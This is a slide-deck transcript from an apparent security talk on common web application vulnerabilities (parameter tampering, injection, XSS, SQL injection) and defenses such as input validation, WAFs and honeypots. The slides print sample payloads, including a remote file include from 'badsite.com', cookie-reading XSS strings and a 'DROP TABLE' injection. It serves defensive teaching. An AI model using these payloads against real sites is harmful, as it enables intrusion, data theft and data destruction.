Protecting Against Common Web Application Vulnerabilities

Slides:



Advertisements
Similar presentations
Past, Present and Future By Eoin Keary and Jim Manico
Advertisements

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.
WebGoat & WebScarab “What is computer security for $1000 Alex?”
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Leveraging User Interactions for In-Depth Testing of Web Applications Sean McAllister, Engin Kirda, and Christopher Kruegel RAID ’08 1 Seoyeon Kang November.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.
Leveraging User Interactions for In-Depth Testing of Web Application Sean McAllister Secure System Lab, Technical University Vienna, Austria Engin Kirda.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Varun Sharma Security Engineer | ACE Team | Microsoft Information Security
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
JavaScript, Fourth Edition
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
School of Computing and Information Systems CS 371 Web Application Programming Security Avoiding and Preventing Attacks.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
Input Validation – common associated risks  ______________ user input controls SQL statements ultimately executed by a database server
Aniket Joshi Justin Thomas. Agenda Introduction to SQL Injection SQL Injection Attack SQL Injection Prevention Summary.
Web Applications Testing By Jamie Rougvie Supported by.
Building Secure Web Applications With ASP.Net MVC.
By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.
Cross Site Scripting and its Issues By Odion Oisamoje.
Web Application Vulnerabilities ECE 4112 Internetwork Security, Spring 2005 Chris Kelly Chris Lewis April 28, 2005 ECE 4112 Internetwork Security, Spring.
Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
EECS 354: Network Security Group Members: Patrick Wong Eric Chan Shira Schneidman Web Attacks Project: Detecting XSS and SQL Injection Vulnerabilities.
INFO 344 Web Tools And Development CK Wang University of Washington Spring 2014.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Web Applications Attacks A: SQL Injection Stored Cross Site Scripting Prof. Reuven Aviv Department of Computer Science Tel Hai Academic College Topics.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
SQL INJECTION Lecturer: A.Prof.Dr. DANG TRAN KHANH Student :Le Nguyen Truong Giang.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Introduction SQL Injection is a very old security attack. It first came into existence in the early 1990's ex: ”Hackers” movie hero does SQL Injection.
Database and Cloud Security
Javascript worms By Benjamin Mossé SecPro
Group 18: Chris Hood Brett Poche
Web Application Security
Module: Software Engineering of Web Applications
CSCE 548 Student Presentation Ryan Labrador
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Chapter 7: Identifying Advanced Attacks
Security: Exploits & Countermeasures
World Wide Web policy.
Static Detection of Cross-Site Scripting Vulnerabilities
CS 371 Web Application Programming
Example – SQL Injection
Defense in Depth Web Server Custom HTTP Handler Input Validation
Lecture 2 - SQL Injection
Security: Exploits & Countermeasures
PHP Forms and Databases.
Exploring DOM-Based Cross Site Attacks
Presentation transcript:

Protecting Against Common Web Application Vulnerabilities Alaa Al-Bahrani Regional Cyber Security Leader, GE

Agenda What? Vulnerabilities 01 04 How? Protect 02 05 Top Attacks Q&A What are web applications? Common vulnerabilities in web applications How? Protect 02 05 How web applications work? How to protect against web application vulnerabilities Top Attacks Q&A 03 06 Top attacks against web applications Questions

Web Applications Application hosted on a webserver Accessed by a web browser Connects to a database backend Favored by many organizations Vulnerable to attacks! This Photo by Unknown Author is licensed under CC BY-SA This Photo by Unknown Author is licensed under CC BY-SA

How they work? Web Application Web Server 3rd Party Internet Web Browser Database

Top Web Application Attacks Source: www.ptsecurity.com

CMS Market Share Content Management Systems WordPress 60% Around 27% of the Internet is Powered by WordPress, which means approximately 75 million websites are currently running WordPress as a CMS. Joomla 6.5% Drupal 4.6% Source: w3techs.com, January 2018 Source: www.whoishostingthis.com

WordPress Vulnerabilities Source: www.wpwhitesecurity.com 2407 vulnerabilities

Common Vulnerabilities Parameter Tampering Command Injection Cross-Site Scripting (XSS) SQL Injection

Parameter Tampering Attack Definition Manipulation of parameters exchanged between client and server in order to modify application data URL Parameters <input type=”hidden” id=”1008” name=”cost” value=”70.00”> www.attackbank.com/default.asp?profile=741&debit=1000 <input type=”hidden” id=”1008” name=”cost” value=”70.00”> www.attackbank.com/default.asp?profile=741&debit=2000 <input type=”hidden” id=”1008” name=”cost” value=”70.00”> www.attackbank.com/savepage.asp?id=147&status=read <input type=”hidden” id=”1008” name=”cost” value=”70.00”> www.attackbank.com/savepage.asp?id=147&status=delete Hidden Fields

Injection Attacks Definition Unsolicited commands and data are passed to the web application due to not validating input <input type=”hidden” id=”1008” name=”cost” value=”70.00”> www.attackbank.com/index.php?page=members.php <input type=”hidden” id=”1008” name=”cost” value=”70.00”> www.attackbank.com/index.php?page=http://badsite.com/attack.php

Injection Attacks

Cross-Site Scripting (XSS) Definition Allows attackers to inject client-side scripts into web pages. The scripts would then be executed once the client visits the vulnerable web page. Stored Reflected When the victim access the vulnerable website, the malicious script executes Hacker injects vulnerable website with malicious scripts to steal information from victim’s browser 02 01 Website The malicious script sends victim information to the attacker Hacker 03 Victim

Cross-Site Scripting (XSS) XSS using Script in Attributes <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> XSS using Script Via Encoded URI Schemes <IMG SRC=j&#X41vascript:alert('test2')> XSS using code encoding <META HTTP-EQUIV="refresh“ CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"> <script>alert('test3')</script>

Cross-Site Scripting (XSS) The same could be used to execute stored XSS attacks in guestbook entries, blog posts, and comments.

Cross-Site Scripting (XSS) Error Page Example http://testsite.test/file_which_not_exist Not found: /file_which_not_exist http://testsite.test/<script>alert("TEST");</script> Not found: / (but with JavaScript code <script>alert("TEST");</script>)

SQL Injection The placement of malicious code in SQL statements, via web page input It is a fault in the code of the web application, not the DBMS A successful SQL injection exploit can: read sensitive data from the database, modify database data (Insert/Update/Delete) execute administration operations on the database (e.g. shutdown the DBMS) recover the content of a given file present on the DBMS file system issue commands to the operating system Photo Source: https://www.link-academy.com/blog/sql-injection-ghidul-celei-mai-utilizate-metode-de-atac

SQL Injection 1=1 (Tautology) Example stringUserID = getRequestString("User_ID"); stringSQL = "SELECT * FROM Users WHERE User_ID = " + stringUserID; 1=1 (Tautology) Example SELECT * FROM Users WHERE User_ID = 110 OR 1=1;

SQL Injection Batched SQL Statements Example stringUserID = getRequestString("User_ID"); stringSQL = "SELECT * FROM Users WHERE User_ID = " + stringUserID; Batched SQL Statements Example SELECT * FROM Users WHERE User_ID = 110; DROP TABLE Suppliers;

SQL Injection Search Bar (UNION) Example stringTitle = getRequestString(“Title”); stringSQL = “SELECT * FROM Authors WHERE Title Like %” + stringTitle + “%”; Search Bar (UNION) Example 1 UNION SELECT 1 FROM information_schema.tables --; SELECT * FROM Authors WHERE Title Like 1 UNION SELECT 1 FROM information_schema.tables --%

SQL Injection Many tools automate SQL injection attacks Any input field can be used Login form Search bar Newsletter registration etc

How To Protect

Defense in Depth Layer 7 Layer 6 Web Application Layer 5 3rd Party Components Database Web Server Operating System Network Physical Security

Protecting Your Web Application Input Validation Code Testing

Web Application Firewall (WAF) Web Server 3rd Party Internet Web Browser Database

Honeypots Honeypots are a security system to detect and divert attacks They replicate system services such as web services They allow collecting more information about the attack Photo Source: https://www.carnaghan.com/honeypots-to-lure-or-not-to-lure/

Thank You